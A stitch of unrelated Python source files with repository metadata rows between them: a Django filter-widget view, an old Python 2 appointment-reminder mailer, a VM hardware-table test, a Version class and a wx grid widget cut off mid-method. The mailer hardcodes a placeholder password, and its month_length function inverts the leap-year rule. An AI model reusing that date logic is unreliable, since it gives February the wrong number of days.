), # Placed before CharField since it inherits from CharField
(forms.CharField, TYPE_STRING),
(forms.IntegerField, TYPE_NUMERIC),
(forms.BooleanField, TYPE_BOOLEAN),
(forms.ChoiceField, TYPE_LIST),
(forms.MultipleChoiceField, TYPE_LIST_MULTIPLE),
)
)
FIELD_NAME_TYPE_MAPPING = {
"activity_identifier": TYPE_NUMERIC,
"fully_updated": TYPE_DATE,
"fully_updated_date": TYPE_DATE,
"updated_date": TYPE_DATE,
"operational_stakeholder": TYPE_AUTOCOMPLETE,
"target_country": TYPE_AUTOCOMPLETE,
}
TYPE_OPERATION_MAPPING = {
TYPE_STRING: ("contains", "is", "is_empty"),
TYPE_NUMERIC: ("lt", "gt", "gte", "lte", "is", "is_empty"),
TYPE_BOOLEAN: ("is", "is_empty"),
TYPE_LIST: ("is", "not_in", "in", "is_empty"),
TYPE_LIST_MULTIPLE: ("is", "not_in", "in", "is_empty"),
TYPE_DATE: ("lt", "gt", "gte", "lte", "is", "is_empty"),
TYPE_AUTOCOMPLETE: ("is", "not_in", "in", "is_empty"),
}
OPERATION_WIDGET_MAPPING = {"is_empty": None}
TYPE_WIDGET_MAPPING = {
TYPE_STRING: [{"operations": ("contains", "is"), "widget": forms.TextInput}],
TYPE_NUMERIC: [
{
"operations": ("lt", "gt", "gte", "lte", "is"),
"widget": forms.NumberInput,
}
],
TYPE_BOOLEAN: [{"operations": ("is",), "widget": forms.Select}],
TYPE_LIST: [
{"operations": ("is",), "widget": forms.Select},
{"operations": ("not_in", "in"), "widget": forms.CheckboxSelectMultiple},
],
TYPE_LIST_MULTIPLE: [
{"operations": ("is",), "widget": forms.CheckboxSelectMultiple},
{"operations": ("not_in", "in"), "widget": forms.CheckboxSelectMultiple},
],
TYPE_DATE: [
{"operations": ("lt", "gt", "gte", "lte", "is"), "widget": DateTimePicker}
],
TYPE_AUTOCOMPLETE: [
{"operations": ("is",), "widget": forms.Select},
{"operations": ("not_in", "in"), "widget": forms.SelectMultiple},
],
}
FIELD_NAME_MAPPING = {"operational_stakeholder": "operating_company_id"}
field_name = ""
name = ""
operation = ""
doc_type = "deal"
def get(self, request, *args, **kwargs):
"""render form to enter values for the requested field in the filter widget for the grid view
form to select operations is updated by the javascript function update_widget() in /media/js/main.js
"""
self.doc_type = kwargs.get("doc_type", "deal")
self.field_name = self.request.GET.get("key_id", "")
self.name = self.request.GET.get("name", "")
self.operation = self.request.GET.get("operation", "")
return Response(
{
"allowed_operations": self.get_allowed_operations(),
"widget": self.render_widget(),
}
)
@property
def field(self):
if not hasattr(self, "_field"):
if self.field_name:
# Deprecated?
if "inv_" in self.field_name: # pragma: no cover
field = get_activity_field_by_key(self.field_name[4:])
elif self.doc_type == "investor":
field = get_investor_field_by_key(self.field_name)
else:
field = get_activity_field_by_key(self.field_name)
# MultiValueField?
if isinstance(field, forms.MultiValueField):
# Get first field instead
field = field.fields[0]
self._field = field
else:
return None
return self._field
@property
def type(self):
field = self.field
if not hasattr(self, "_type"):
# Get type by field class
for field_class, field_type in self.FIELD_TYPE_MAPPING.items():
if isinstance(field, field_class):
self._type = field_type
break
# Get type by field name
if self.field_name in self.FIELD_NAME_TYPE_MAPPING.keys():
self._type = self.FIELD_NAME_TYPE_MAPPING.get(self.field_name)
# Fallback to string
if not hasattr(self, "_type"):
self._type = self.TYPE_STRING
return self._type
@property
def value(self):
if not hasattr(self, "_value"):
value = self.request.GET.get("value", "")
if value:
# Date?
if self.type == self.TYPE_DATE:
value = datetime.strptime(value, "%Y-%m-%d")
else:
# Boolean?
if self.type == self.TYPE_BOOLEAN:
value = "True"
# Make list
if self.type in (self.TYPE_LIST, self.TYPE_LIST_MULTIPLE):
self._value = value and value.split(",") or []
else:
self._value = value
return self._value
def get_allowed_operations(self):
return self.TYPE_OPERATION_MAPPING[self.type]
def get_attrs(self):
# Merge custom with existing field attributes
attrs = {"id": "id_{}".format(self.name)}
if not self.field or not hasattr(
self.field.widget, "attrs"
): # pragma: no cover
return attrs
if not self.type == self.TYPE_LIST_MULTIPLE and not (
self.type == self.TYPE_LIST and self.operation in ("in", "not_in")
):
attrs["class"] = "valuefield form-control"
field_attrs = self.field.widget.attrs
for key, value in field_attrs.items(): # pragma: no cover
if key in ("readonly",):
continue
if key in attrs and key == "class":
attrs[key] += " %s" % field_attrs[key]
else:
attrs[key] = field_attrs[key]
return attrs
def get_widget_init_kwargs(self):
kwargs = {}
# Get boolean choices (Yes/No)
if self.type == self.TYPE_BOOLEAN:
kwargs["choices"] = [("True", _("Yes")), ("False", _("No"))]
# Get list choices
if self.type in (self.TYPE_LIST, self.TYPE_LIST_MULTIPLE):
kwargs["choices"] = self.field.choices
# Get date options
if self.type == self.TYPE_DATE:
kwargs["options"] = {"format": "YYYY-MM-DD", "inline": True}
return kwargs
def get_widget_render_kwargs(self):
return {"name": self.name, "value": self.value, "attrs": self.get_attrs()}
def get_widget_class(self):
operation_mappings = self.TYPE_WIDGET_MAPPING[self.type]
widget = None
for operation_mapping in operation_mappings:
if self.operation in operation_mapping["operations"]:
widget = operation_mapping["widget"]
return widget
def render_widget(self):
widget = self.get_widget_class()
if widget:
widget = widget(**self.get_widget_init_kwargs())
widget = self._pre_render_widget(widget)
widget = widget.render(**self.get_widget_render_kwargs())
widget = self._post_render_widget(widget)
return widget
def _pre_render_widget(self, widget):
if self.type == self.TYPE_DATE:
# See here: https://github.com/jorgenpt/django-bootstrap3-datetimepicker/commit/042dd1da3a7ff21010c1273c092cba108d95baeb#commitcomment-16877308
widget.js_template = """
<script>
$(function(){$("#%(picker_id)s:has(input:not([readonly],[disabled]))")
.datetimepicker(%(options)s);});
</script>
"""
return widget
def _post_render_widget(self, widget):
return widget
def get_activity_variable_table():
"""
Create an OrderedDict of group name keys with lists of dicts for each
variable in the group (each dict contains 'name' and 'label' keys).
This whole thing is static, and maybe should just be written out, but
for now generate it dynamcially on app load.
"""
# for formsets, we want form.form
deal_forms = [form.form if hasattr(form, "form") else form for form in DEAL_FORMS]
variable_table = OrderedDict()
group_items = []
group_title = ""
# Add Activity attributes
variable_table[str(_("Deal"))] = []
for field_name, field in ActivityFilterForm.base_fields.items():
if field_name == "id": # pragma: no cover
continue
variable_table[str(_("Deal"))].append(
{"name": field_name, "label": str(field.label)}
)
# Add deal attributes
exclude = ("intended_area", "contract_area", "production_area")
for form in deal_forms:
for field_name, field in form.base_fields.items():
if field_name in exclude:
continue
if isinstance(field, TitleField):
if group_title and group_items:
variable_table[group_title] = group_items
group_items = []
group_title = str(field.initial)
else:
group_items.append({"name": field_name, "label": field.label})
if group_title and group_items:
variable_table[group_title] = group_items
# Add operating company attributes
if _("Operating company") not in variable_table: # pragma: no cover
variable_table[str(_("Operating company"))] = []
for field_name, field in OperationalCompanyForm.base_fields.items():
if field_name == "id":
continue
variable_table[str(_("Operating company"))].append(
{
"name": "operating_company_%s" % field_name,
"label": "%s %s" % (str(_("Operating company")), str(field.label)),
}
)
# Add parent company attributes
variable_table[str(_("Parent company"))] = []
for field_name, field in ParentStakeholderForm.base_fields.items():
if field_name == "id":
continue
variable_table[str(_("Parent company"))].append(
{
"name": "parent_stakeholder_%s" % field_name,
"label": "%s %s" % (str(_("Parent company")), str(field.label)),
}
)
# Add tertiary investors/lenders attributes
variable_table[str(_("Tertiary investor/lender"))] = []
for field_name, field in ParentInvestorForm.base_fields.items():
if field_name == "id":
continue
variable_table[str(_("Tertiary investor/lender"))].append(
{
"name": "parent_investor_%s" % field_name,
"label": "%s %s"
% (str(_("Tertiary investor/lender")), str(field.label)),
}
)
return variable_table
def get_investor_variable_table():
"""
Create an OrderedDict of group name keys with lists of dicts for each
variable in the group (each dict contains 'name' and 'label' keys).
This whole thing is static, and maybe should just be written out, but
for now generate it dynamcially on app load.
"""
variable_table = OrderedDict()
group_items = []
group_title = ""
# Add investor attributes
investor_variables = []
for field_name, field in InvestorFilterForm.base_fields.items():
if field_name == "id": # pragma: no cover
continue
investor_variables.append({"name": field_name, "label": str(field.label)})
variable_table[str(_("Investor"))] = investor_variables
# Add parent company attributes
pc_variables = []
for field_name, field in ParentStakeholderForm.base_fields.items():
if field_name == "id":
continue
pc_variables.append(
{
"name": "parent_stakeholder_%s" % field_name,
"label": "%s %s" % (str(_("Parent company")), str(field.label)),
}
)
variable_table[str(_("Parent company"))] = pc_variables
# Add tertiary investors/lenders attributes
til_variables = []
for field_name, field in ParentInvestorForm.base_fields.items():
if field_name == "id":
continue
til_variables.append(
{
"name": "parent_investor_%s" % field_name,
"label": "%s %s"
% (str(_("Tertiary investor/lender")), str(field.label)),
}
)
variable_table[str(_("Tertiary investor/lender"))] = til_variables
return variable_table
class FilterWidgetMixin:
doc_type = "deal"
variable_table = get_activity_variable_table()
# def __init__(self, *args, **kwargs):
# super().__init__(*args, **kwargs)
# self.rules = []
#
# @property
# def filters(self):
# return self.get_filter_context(self.current_formset_conditions)
#
# @property
# def current_formset_conditions(self):
# data = self.request.GET.copy()
# filter_set = self._filter_set(data)
# conditions_formset = self.get_formset_conditions(filter_set, data)
#
# return conditions_formset
def get_context_data(self, **kwargs):
if hasattr(super(), "get_context_data"):
context = super().get_context_data(**kwargs)
else:
context = {}
data = self.request.GET.copy()
self.set_country_region_filter(data)
self.set_default_filters(data)
context.update(
{
# 'filters': self.filters,
# 'empty_form_conditions': self.current_formset_conditions,
# 'rules': self.rules,
"variables": self.variable_table,
"presets": FilterPresetGroup.objects.all(),
"set_default_filters": self.request.session.get(
"%s:set_default_filters" % self.doc_type
),
"status": self.status,
}
)
return context
# def get_filter_context(self, formset_conditions, order_by=None, group_by=None,
# group_value=None, starts_with=None):
# filters = BrowseFilterConditions(formset_conditions, [], 0).parse()
#
# filters['order_by'] = order_by # required for table group view
# filters['group_by'] = group_by
# filters['group_value'] = group_value
#
# filters['starts_with'] = starts_with
#
# return filters
def set_country_region_filter(self, data):
filter_values = {}
# Country or region filter set?
if data.get("country", None) or data.get("region", None):
stored_filters = self.request.session.get("%s:filters" % self.doc_type, {})
if not stored_filters:
stored_filters = {}
if data.get("country", None):
if self.doc_type == "deal":
filter_values["variable"] = "target_country"
filter_values["label"] = _("Target country")
else:
filter_values["variable"] = "fk_country"
filter_values["label"] = _("Country of registration/origin")
filter_values["operator"] = "is"
filter_values["value"] = data.get("country")
try:
country = Country.objects.defer("geom").get(pk=data.get("country"))
filter_values["display_value"] = country.name
except: # pragma: no cover
pass
filter_values["name"] = "country"
data.pop("country")
elif data.get("region", None):
if self.doc_type == "deal":
filter_values["variable"] = "target_region"
filter_values["label"] = str(_("Target region"))
else:
filter_values["variable"] = "region"
filter_values["label"] = str(_("Region of registration/origin"))
filter_values["operator"] = "is"
filter_values["value"] = data.get("region")
try:
region = Region.objects.get(pk=data.get("region"))
filter_values["display_value"] = region.name
except: # pragma: no cover
pass
filter_values["name"] = "region"
data.pop("region")
# Remove existing target country/region filters
filters = filter(
lambda f: f.get("name") in ("country", "region"),
stored_filters.values(),
)
for stored_filter in list(filters):
stored_filters.pop(stored_filter["name"], None)
if filter_values:
# Set filter
new_filter = Filter(
variable=filter_values["variable"],
operator=filter_values["operator"],
value=filter_values["value"],
name=filter_values.get("name", None),
label=filter_values["label"],
display_value=filter_values.get("display_value", None),
)
stored_filters[new_filter.name] = new_filter
self.request.session["%s:filters" % self.doc_type] = stored_filters
else:
self.remove_country_region_filter()
def remove_country_region_filter(self):
stored_filters = self.request.session.get("%s:filters" % self.doc_type, {})
if stored_filters:
stored_filters = dict(
filter(
lambda i: i[1].get("name", "") not in ("country", "region"),
stored_filters.items(),
)
)
self.request.session["%s:filters" % self.doc_type] = stored_filters
# stored_filters = self.request.session['filter_query_params']
# stored_filters = dict(filter(lambda i: i[1].get('variable', '') not in ('target_country', 'target_region'), stored_filters.items()))
self.request.session["%s:filter_query_params" % self.doc_type] = None
def set_default_filters(self, data, disabled_presets=[], enabled_presets=[]):
self.remove_default_filters()
# Don't set default filters? Set them by default (required e.g. for statistics).
if not self.request.session.get(
"%s:set_default_filters" % self.doc_type, False
):
return
if not disabled_presets:
if hasattr(self, "disabled_presets") and self.disabled_presets:
disabled_presets = self.disabled_presets
if not enabled_presets:
if hasattr(self, "enabled_presets") and self.enabled_presets:
enabled_presets = self.enabled_presets
stored_filters = self.request.session.get("%s:filters" % self.doc_type, {})
if not stored_filters:
stored_filters = {}
# Target country or region set?
filter_names = [v.get("name", "") for k, v in stored_filters.items()]
preset_ids = dict(
[(v.get("preset_id", ""), k) for k, v in stored_filters.items()]
)
if "country" in filter_names:
# Use national presets
for preset in FilterPreset.objects.filter(is_default_country=True):
if preset.id in preset_ids.keys(): # pragma: no cover
del stored_filters[preset_ids[preset.id]]
if preset.id in disabled_presets: # pragma: no cover
continue
if preset.id in enabled_presets: # pragma: no cover
del enabled_presets[enabled_presets.index(preset.id)]
filter_name = "default_preset_%i" % preset.id
stored_filters[filter_name] = PresetFilter(
preset, name=filter_name, hidden=preset.is_hidden
)
else:
# Use global presets
for preset in FilterPreset.objects.filter(is_default_global=True):
if preset.id in preset_ids.keys(): # pragma: no cover
del stored_filters[preset_ids[preset.id]]
if preset.id in disabled_presets: # pragma: no cover
continue
filter_name = "default_preset_%i" % preset.id
stored_filters[filter_name] = PresetFilter(
preset, name=filter_name, hidden=preset.is_hidden
)
# Add enabled filters (if not already set)
for preset_id in enabled_presets:
if "default_preset_%i" % preset_id not in stored_filters.keys():
preset = FilterPreset.objects.get(pk=preset_id)
if preset.id in preset_ids.keys(): # pragma: no cover
del stored_filters[preset_ids[preset.id]]
if preset.id in disabled_presets:
continue
filter_name = "default_preset_%i" % preset.id
stored_filters[filter_name] = PresetFilter(
preset, name=filter_name, hidden=preset.is_hidden
)
self.request.session["%s:filters" % self.doc_type] = stored_filters
def remove_default_filters(self):
stored_filters = self.request.session.get("%s:filters" % self.doc_type, {})
if stored_filters:
stored_filters = dict(
filter(lambda i: "default_preset" not in i[0], stored_filters.items())
)
self.request.session["%s:filters" % self.doc_type] = stored_filters
# def get_formset_conditions(self, filter_set, data, group_by=None):
# self.set_country_region_filter(data)
# self.set_default_filters(data)
#
# if filter_set:
# # set given filters
# result = ConditionFormset(data, prefix="conditions_empty")
# else:
# if group_by == "database":
# result = None
# else:
# result = ConditionFormset(self._get_filter_dict(self.rules), prefix="conditions_empty")
# return result
#
# def _filter_set(self, data):
# return data and data.get("filtered") and not data.get("reset", None)
#
# def _get_filter_dict(self, browse_rules):
# filter_dict = MultiValueDict()
# for record, c in enumerate(browse_rules):
# rule_dict = MultiValueDict({
# "conditions_empty-%i-variable" % record: [c.variable],
# "conditions_empty-%i-operator" % record: [c.operator]
# })
# # pass comma separated list as multiple values for operators in/not in
# if c.operator in ("in", "not_in"):
# rule_dict.setlist("conditions_empty-%i-value" % record, c.value.split(","))
# else:
# rule_dict["conditions_empty-%i-value" % record] = c.value
# filter_dict.update(rule_dict)
# filter_dict["conditions_empty-INITIAL_FORMS"] = len(browse_rules)
# filter_dict["conditions_empty-TOTAL_FORMS"] = len(browse_rules)
# filter_dict["conditions_empty-MAX_NUM_FORMS"] = ""
# return filter_dict
@property
def status(self):
if self.request.user.is_authenticated and "status" in self.request.GET:
return self.request.GET.getlist("status")
return [
"2",
"3",
] # FIXME: Use Activity.STATUS_ACTIVE + Activity.STATUS_OVERWRITTEN
| agpl-3.0 | -274,360,651,482,665,100 | 39.459547 | 155 | 0.552352 | false | 4.069661 | false | false | false |
Sodel-the-Vociferous/early-code | camden-office-appt-reminder/send_reminders.py | 1 | 16094 | #!/usr/bin/env python
# ############################## #
# (C)2007 Daniel Ralston #
# Appointment Reminder Software #
# #
# callback.py #
# ############################## #
import shelve
import sys
import calendar
import sys
import time
import datetime
import os
import send_mail
internal = True
class Database:
#Provides a central storage unit to keep track of any and all our data
def __init__(self):
self.appointments = {}
self.clients = {}
self.preferences = {"save at close": True,
"send reminders": True,
"send at login": True,
"company": "",
"email": ""}
self.possible_times = { 1:"7:00",
2:"7:15",
3:"7:30",
4:"7:45",
5:"8:00",
6:"8:15",
7:"8:30",
8:"8:45",
9:"9:00",
10:"9:15",
11:"9:30",
12:"9:45",
13:"10:00",
14:"10:15",
15:"10:30",
16:"10:45",
17:"11:00",
18:"11:15",
19:"11:30",
20:"11:45",
21:"12:00pm",
22:"12:15pm",
23:"12:30pm",
24:"12:45pm",
25:"1:00pm",
26:"1:15pm",
27:"1:30pm",
28:"1:45pm",
29:"2:00pm",
30:"2:15pm",
31:"2:30pm",
32:"2:45pm",
33:"3:00pm",
34:"3:15pm",
35:"3:30pm",
36:"3:45pm",
37:"4:00pm",
38:"4:15pm",
39:"4:30pm",
40:"4:45pm",
41:"5:00pm",
42:"5:15pm",
43:"5:30pm",
44:"5:45pm",
45:"6:00pm",
46:"6:15pm",
47:"6:30pm",
48:"6:45pm",
49:"7:00pm",
50:"7:15pm",
51:"7:30pm",
52:"7:45pm",
53:"8:00pm",
54:"8:15pm",
55:"8:30pm",
56:"8:45pm",
57:"9:00pm"}
self.day_names = {1: "Monday",
2: "Tuesday",
3: "Wednesday",
4: "Thursday",
5: "Friday",
6: "Saturday",
7: "Sunday"}
self.current_user = ""
self.close_program = False
def new_appointment(self, year, month, day, time, length, email, email_bool, client, notes = None, force = False):
# length is the length in minutes divided by 15
if client != "":
if force == True:
if (year, month, day, time) in database.appointments:
database.remove_appointment(year, month, day, time)
if (year, month, day, time) not in self.appointments:
i = 1
exists = 0
while i < length:
if (year, month, day, time+i) not in self.appointments:
pass
else:
error_handler.error(None, "Prior Appointment Exists In Specified Time Range")
return 1
i = i + 1
else:
self.appointments[(year, month, day, time)] = Appointment(year, month, day, time, length, email, email_bool, client, notes)
i = 1
while (i < length) and (time + i in self.possible_times):
self.appointments[(year, month, day, time + i)] = client
i = i + 1
return 0
else:
error_handler.error(None, "Prior Appointment Exists In Specified Timeslot")
return 1
def remove_appointment(self, year, month, day, time):
#where time is the length of the appointment divided by 15(minutes)
if (year, month, day, time) in self.appointments:
length = self.appointments[(year, month, day, time)].length
del self.appointments[(year, month, day, time)]
i = 1
while (i < length) and (time + i in self.possible_times):
del self.appointments[(year, month, day, time + i)]
i = i + 1
else:
print "yo"
error_handler.error(None, "No Appointment At Specified Timeslot")
return
def new_client(self, name, email, email_bool, notes = None, force = False):
if name not in self.clients:
self.clients[name] = name
self.clients[name] = Client(name, email, email_bool)
else:
if force == False:
error_handler.error(None, "Client Of That Name In Record")
else:
del self.clients[name]
self.new_client(name, email, email_bool, notes)
return
def remove_client(self, widget, name):
appts = self.appointments
if name in self.clients:
del self.clients[name]
for entry in appts:
if self.appointments[entry].client == name:
del self.appointments[entry]
return
def save_data(self, widget = None, user = None):
preferences = shelve.open("preferences")
key_base = shelve.open("key_base")
appointments = shelve.open("appointments")
clients = shelve.open("clients")
for i in key_base:
del key_base[i]
for i in appointments:
del appointments[i]
for i in preferences:
del preferences[i]
for i in self.preferences:
preferences[i] = self.preferences[i]
for i in clients:
del clients[i]
for i in self.clients:
clients[i] = self.clients[i]
iteration = 0
for i in self.appointments:
appointments[str(iteration)] = self.appointments[i]
key_base[str(iteration)] = i
iteration = iteration + 1
appointments.close()
clients.close()
preferences.close()
return
def get_data(self, widget = None, user = None):
preferences = shelve.open("preferences")
appointments = shelve.open("appointments")
key_base = shelve.open("key_base")
clients = shelve.open("clients")
for i in preferences:
self.preferences[i] = preferences[i]
for i in clients:
self.clients[i] = clients[i]
iteration = 0
for i in appointments:
if appointments[str(iteration)] != "":
self.appointments[key_base[str(iteration)]] = appointments[str(iteration)]
iteration = iteration + 1
appointments.close()
clients.close()
preferences.close()
return
class Client:
def __init__(self, name, email, email_bool, notes = None):
self.name = name
self.email = email
self.email_bool = email_bool
notes = []
if notes != None:
for i in notes:
self.notes.append(notes[i]) #Special notes can be added easily
class Appointment:
def __init__(self, year, month, day, time, length, email, email_bool, client, auto_blocked = 0, notes = None):
self.year = year
self.month = month
self.day = day
self.time = time
self.length = length
self.email = email
self.email_bool = email_bool
self.client = client
self.auto_blocked = auto_blocked
self.notes = []
self.sent = False
if notes != None:
for i in notes:
self.notes.append(notes[i])
class Error_Handler:
def error(self, widget = None, message = None, type = "ok", positive = None, negative = None, parameter1 = None, parameter2 = None, size_x = 320, size_y = 200, prev_window = None):
#Error "hub" where the appropraite dialogs are dispatched from.
#"positive" is the appropriate function to call if the type is "yes/no", and the anser is affirmative
#"parameter1" is the "positive" function's parameter
#"negative" and "parameter2"hold the call if the type is "yes/no", and the answer is negative
if prev_window != None:
prev_window.hide_all()
self.error_window = gtk.Window()
self.error_window.set_title('Error')
self.error_window.set_border_width(5)
self.error_window.connect("destroy", self.destroy_error_dialog, prev_window)
self.error_window.set_resizable(False)
error_box = gtk.VBox(False, 10)
error_box.set_size_request(size_x, size_y)
self.error_window.add(error_box)
error_box.add(gtk.Label(message))
if type == "ok":
ok_button = gtk.Button("OK")
ok_button.connect("clicked", self.destroy_error_dialog)
error_box.add(ok_button)
elif type == "yes/no":
prev_window.hide_all()
yes_button = gtk.Button("Okay")
error_box.add(yes_button)
no_button = gtk.Button("Cancel")
error_box.add(no_button)
if positive != None:
yes_button.connect("clicked", self.exec_positive, prev_window, positive, parameter1)
if negative != None:
no_button.connect("clicked", negative, parameter2)
self.error_window.show_all()
def destroy_error_dialog(self, widget = None, prev_window = None):
if prev_window != None:
prev_window.show_all()
self.error_window.destroy()
pass
def exec_positive(self, widget, prev_window, positive, parameter1):
if prev_window != None:
prev_window.show_all()
self.destroy_error_dialog
positive(None, parameter1)
class Date:
def __init__(self, year, month, day):
self.year = year
self.month = month
self.day = day
self.time = time
def increment_days(self, days):
if (days >= 0):
target_year = self.year
#print target_year
target_month = self.month
#print target_month
target_day = self.day
#print target_day
month_length = self.month_length(self.month, self.year)
#print month_length, "len"
iterations = 0
while (iterations < days):
if target_day == month_length:
target_day = 1
#print target_day, "day"
target_month = self.increment_month()[0]
#print target_month, "month"
target_year = self.increment_month()[1]
#print target_year, "year"
iterations = iterations + 1
#print iterations, "\n"
else:
target_day = target_day + 1
#print target_day, "Tag"
#print target_month, "month#"
#print target_year, "Jahre"
iterations = iterations + 1
#print iterations, "\n"
return (target_year, target_month, target_day)
else:
error_handler.error("increment_days(self, days): Error, negative input")
def increment_month(self, months = 1):
if months >= 0:
if self.month == 12:
return (1, self.year + 1)
else:
return (self.month + 1, self.year)
else:
error_handler.error("increment_months(self.months): Error, negative input")
def month_length(self, month, year):
if month == 1:
return 31
elif month == 2:
if (year % 4 == 0 and year % 100 != 0) or (year % 400 == 0):
return 28
else:
return 29
elif month == 3:
return 31
elif month == 4:
return 30
elif month == 5:
return 31
elif month == 6:
return 30
elif month == 7:
return 31
elif month == 8:
return 31
elif month == 9:
return 30
elif month == 10:
return 31
elif month == 11:
return 30
elif month == 12:
return 31
class Sender:
def get_today(self):
year, month, day, a, b, c, d, e, f = time.localtime()
return year, month, day
def query(self):
print ("Querying...")
for year, month, day, time in database.appointments:
if str(type(database.appointments[year, month, day, time])) !="<type \'str\'>":
if database.appointments[year, month, day, time].sent == False:
if database.appointments[year, month, day, time].email_bool == True:
company = database.preferences["company"]
sender = database.current_user
sender_email = "[email protected]"
password = "password"
recipient_name = database.appointments[year, month, day, time].client
recipient_email = database.clients[recipient_name].email
for i in database.possible_times:
ntime = database.possible_times[time]
if i == time:
time = i
if send_mail.send_message(company, sender, sender_email, password, recipient_email, recipient_name, year, month, day, ntime) == 0:
database.appointments[year, month, day, time].sent = True
print ("Sent message to "+recipient_name+" for appointment "+str(year)+", "+str(month)+", "+str(day)+str(time))
else:
print ("Error sending message to "+recipient_name+" for appointment "+str(year)+", "+str(month)+", "+str(day)+str(ntime))
if __name__ == "__main__":
yn = ""
print "This program automatically checks for pending e-mail reminders."
print "Do you want to send pending e-mails now?"
yn = str(raw_input("[y/n]>"))
if yn == "y":
error_handler = Error_Handler()
database = Database()
today = Sender().get_today()
database.current_user = "JRandomUser"
os.chdir((str(sys.path[0])+"/databases/"+"JRandomUser"))
database.get_data()
Sender().query()
database.save_data(user = database.current_user)
elif yn == "n":
print "Closing..."
else:
print "Unrecognized Command.\nClosing..." | gpl-2.0 | 6,182,198,387,813,300,000 | 40.375321 | 184 | 0.456568 | false | 4.415364 | false | false | false |
happz/ducky | tests/hdt.py | 1 | 2496 | import ducky.config
import ducky.boot
import ducky.mm
from hypothesis import given
from hypothesis.strategies import integers
from ctypes import sizeof
from . import common_run_machine, LOGGER
from functools import partial
def setup_machine(cpus, cores, memory):
machine_config = ducky.config.MachineConfig()
machine_config.add_section('memory')
machine_config.set('memory', 'size', memory)
M = common_run_machine(machine_config = machine_config, cpus = cpus, cores = cores, post_boot = [lambda _M: False])
return M
@given(cpus = integers(min_value = 0, max_value = 0xF), cores = integers(min_value = 0, max_value = 0xF), memory = integers(min_value = ducky.mm.MINIMAL_SIZE * ducky.mm.PAGE_SIZE, max_value = 0xFFFFFF00))
def test_sanity(cpus, cores, memory):
memory &= ducky.mm.PAGE_MASK
LOGGER.debug('TEST: cpus=%d, cores=%d, memory=0x%08X', cpus, cores, memory)
M = setup_machine(cpus, cores, memory)
assert M.nr_cpus == cpus
assert M.nr_cores == cores
S = M.capture_state()
memory_node = S.get_child('machine').get_child('memory')
hdt_page = ducky.boot.DEFAULT_HDT_ADDRESS // ducky.mm.PAGE_SIZE
hdt_page = [pg_node for pg_node in memory_node.get_page_states() if pg_node.index == hdt_page][0]
def __base_assert(size, page, offset, value):
for i, byte_offset, byte_shift in [(1, 0, 0), (2, 1, 8), (3, 2, 16), (4, 3, 24)]:
expected = (value >> byte_shift) & 0xFF
actual = page.content[offset + byte_offset]
assert expected == actual, 'Byte at offset %d + %d expected 0x%02X, 0x%02X found instead' % (offset, byte_offset, expected, actual)
if i == size:
break
__assert_u16 = partial(__base_assert, 2, hdt_page)
__assert_u32 = partial(__base_assert, 4, hdt_page)
from ducky.mm import u16_t, u32_t
ptr = 0
# HDT header - magic
__assert_u32(ptr, ducky.hdt.HDT_MAGIC); ptr += sizeof(u32_t)
# HDT header - entries count
__assert_u32(ptr, 2); ptr += sizeof(u32_t)
# HDT header - length
__assert_u32(ptr, 28); ptr += sizeof(u32_t)
# Memory
__assert_u16(ptr, ducky.hdt.HDTEntryTypes.MEMORY); ptr += sizeof(u16_t)
__assert_u16(ptr, sizeof(ducky.hdt.HDTEntry_Memory)); ptr += sizeof(u16_t)
__assert_u32(ptr, memory); ptr += sizeof(u32_t)
# CPU
__assert_u16(ptr, ducky.hdt.HDTEntryTypes.CPU); ptr += sizeof(u16_t)
__assert_u16(ptr, sizeof(ducky.hdt.HDTEntry_CPU)); ptr += sizeof(u16_t)
__assert_u16(ptr, cpus); ptr += sizeof(u16_t)
__assert_u16(ptr, cores); ptr += sizeof(u16_t)
| mit | 549,640,371,277,279,550 | 33.191781 | 204 | 0.665865 | false | 2.820339 | true | false | false |
mdrohmann/txtemplates | txtemplates/dist.py | 1 | 2685 | # encoding: utf-8
"""
Package for configuration of version numbers.
"""
class IncomparableVersions(TypeError):
"""
Two versions could not be compared.
"""
class Version(object):
def __init__(self, package, major, minor, patch, prerelease=None):
"""
Args:
package (str): Package name
major (int): Major version number
minor (int): Minor version number
patch (int): Patch number
Kwargs:
prerelease (str): pre-release specifier
"""
self.package = package
self.major = major
self.minor = minor
self.patch = patch
self.prerelease = prerelease
def short(self):
"""
Return a string in short version format,
<major>.<minor>
"""
return "{major}.{minor}".format(**self.__dict__)
def long(self):
"""
Return a string in version format,
<major>.<minor>.<patch>[-prerelease]
"""
s = "{major}.{minor}.{patch}".format(**self.__dict__)
if self.prerelease:
s = "{}-{}".format(s, self.prerelease)
return s
def __repr__(self):
return "[{}, version {}]".format(self.package, self.long())
def __str__(self):
return "[{}, version {}]".format(self.package, self.long())
def __cmp__(self, other):
"""
Compare two versions, considering major versions, minor versions, micro
versions, then prereleases.
A version with a prerelease is always less than a version without a
prerelease. All prerelease string are considered identical in value.
Args:
other (Version): Another version.
Returns:
one of -1, 0, or 1.
Raises:
- NotImplementedError: when the other version is not a Version
object
- IncomparableVersions: when the package names of the versions
differ.
"""
if not isinstance(other, self.__class__):
raise NotImplementedError
if self.package != other.package:
raise IncomparableVersions(
"{} != {}".format(self.package, other.package))
if self.prerelease:
pre = 0
else:
pre = 1
if other.prerelease:
otherpre = 0
else:
otherpre = 1
x = cmp(
(self.major,
self.minor,
self.patch,
pre),
(other.major,
other.minor,
other.patch,
otherpre))
return x
# vim:set ft=python sw=4 et spell spelllang=en:
| bsd-3-clause | -734,281,179,381,470,200 | 24.330189 | 79 | 0.52514 | false | 4.558574 | false | false | false |
eyeofhell/pyuser | pyuser/grid_wx.py | 1 | 1446 | #!/usr/bin/env python
# coding:utf-8 vi:et:ts=2
# PyUser grid widget for wxWidgets backend.
# Copyright 2013 Grigory Petrov
# See LICENSE for details.
import wx
from support_widget import Widget
import pyuser as pu
##c Grid layout, default for 2 columns (settings etc).
class Grid( Widget ):
def __init__( self, s_name = None, o_parent = 'auto', n_columns = 2 ):
Widget.__init__( self, s_name = s_name, o_parent = o_parent )
self._context_o = wx.FlexGridSizer( cols = n_columns )
self._columns_n = n_columns
## 0-based index of next column being added.
self._nextColumn_n = 0
## 0-based index of current row being added.
self._row_n = 0
def context( self ):
return self._context_o
##x Overloads |Widget|.
def dadd( self, o_widget ):
Widget.dadd( self, o_widget )
mCfg = { 'proportion': 0, 'item': o_widget }
if o_widget.grow().cx() and o_widget.grow().cy():
mCfg[ 'proportion' ] = 1
mCfg[ 'flag' ] = wx.Expand
elif o_widget.grow().cx():
mCfg[ 'proportion' ] = 1
elif o_widget.grow().cy():
mCfg[ 'flag' ] = wx.Expand
self.Add( ** mCfg )
self._nextColumn_n += 1
if self._nextColumn_n >= self._columns_n:
